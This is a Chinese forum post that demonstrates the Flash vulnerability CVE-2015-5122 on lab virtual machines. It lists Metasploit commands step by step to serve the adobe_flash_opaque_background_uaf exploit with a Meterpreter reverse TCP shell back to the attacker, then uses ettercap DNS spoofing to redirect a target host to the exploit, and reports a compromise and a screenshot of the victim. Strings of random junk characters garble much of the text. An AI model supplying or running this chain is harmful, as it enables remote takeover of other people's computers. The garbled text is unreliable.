找回密码
 立即注册
查看: 1962|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 {6 ?9 Z3 y# w; U/ z 二、cve2015-5122漏洞实例演示虚拟机 " r7 n! B3 P% Q: d6 S, \/ i

% N6 _4 j. |$ u9 B& }, ~

( N6 o& z" A- x u0 n) s, [3 ]   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: J9 w8 U* u5 M

# m7 x! p5 d- a# }

8 i4 e/ U0 I" S' T3 ~" y8 n* n search cve-2015-5122如图: 2 [6 n( W: ^8 {. V& _ @& ?# k

" H# `3 H; F8 f: | p+ x |6 @

0 C7 k U+ O! ~0 D& r* p( S   ; E; v! N1 E1 A& y

! e/ b$ I P9 M# l: K ?0 u6 i1 }

+ P: ^$ @; O( I) A) u8 j 下面我们敲如下命令: / n0 O8 e1 @5 r6 q

6 r3 L$ g, A, @ K6 z6 q

( l, V2 [( y# t! w n- q use exploit/multi/browser/adobe_flash_opaque_background_uaf " v, X) H& u8 y/ E5 P$ o1 B4 v3 h! D

% g/ U% }' W! g( ?% r4 ?

" P1 T& n1 b: h- Y set PAYLOAD windows/meterpreter/reverse_tcp ' P# O! q* t E

* o8 F! H, i1 e: w5 f) Y. ^/ X- u

& `2 E" s, X$ z) f set LHOST 192.168.0.109 / a- E9 N( I2 c+ k

u! p0 U+ R+ ]: Q

3 P( i( `/ y& W. E) O set URIPATH /                        /*根目录*/ : u1 p0 l9 B/ y8 c

/ l: K5 H3 b( ?8 \* Y

+ B/ r# l1 \! i7 p. c1 U' y' D set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 3 w$ l2 O3 ~: q/ W4 z) z

+ S" B: p b# W8 U/ `) ?# q( ?

8 C- Q0 `/ }: }" j' E4 O set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 . g& w; ?% D4 o3 y0 f$ e

( N/ z c5 }* `$ W7 j0 r+ s8 S

" N4 _% u, a' F- P" @0 @# \- G+ g 然后show options如图: 9 S1 f2 y. ]) F2 \$ {4 O

9 S1 \, K, t# ~# T" C

# d0 E$ |) _8 ] }5 W& Q& {   7 @' U$ P- B5 a/ N6 C; T, l* j( l1 H3 W& q

6 G' l6 J3 j5 I: m) }# ^' [# ]

3 S: O8 Z9 y0 r t/ g# k 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
% W8 ?8 u3 U8 O2 m8 W
( C' N5 s4 O: Y6 E z: z" L' O5 w9 K

4 t% a" c0 q1 u: g3 L' s9 z

$ J* O9 x+ i, g. j4 H 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ( Q. f& d: `3 s4 g" U6 i; v) ^

, O' S+ f9 L3 q4 n+ h$ Y& ]

$ X3 _# n3 m# ?6 D: O Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ; ~& A0 O! u: d0 o" I

, T9 ^6 N3 @+ L8 N# z

+ g, D% N" {* M9 g   1 j% k4 i% }, s+ O6 t) f7 ]

4 }# }5 `' D* F8 {& ?/ i

- g0 z. E' S; ` 成功了,这时候我们断开ettercap,如图: ! e8 L# X5 n5 B4 |4 V

- v6 l2 z' b" L$ l

4 N+ |7 y @* a- C Y   ' p, ?" L/ T0 Z; W& T) A

% n0 L2 v: j# m% M4 T# G

) x8 C3 I( B9 j B% y% _+ J g5 i I# V9 V/ M Screenshot如图: * d# C, H6 N* f7 t7 N% V

7 ]7 n" n6 ^* F

7 w) n* V! S7 U" s   6 @5 q v: e: f1 x" B U1 H U

7 H; t$ X/ W( H* v5 d8 B( T" ?

3 P0 ~- ~6 e5 i3 C , G4 _+ U7 I) k. B

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表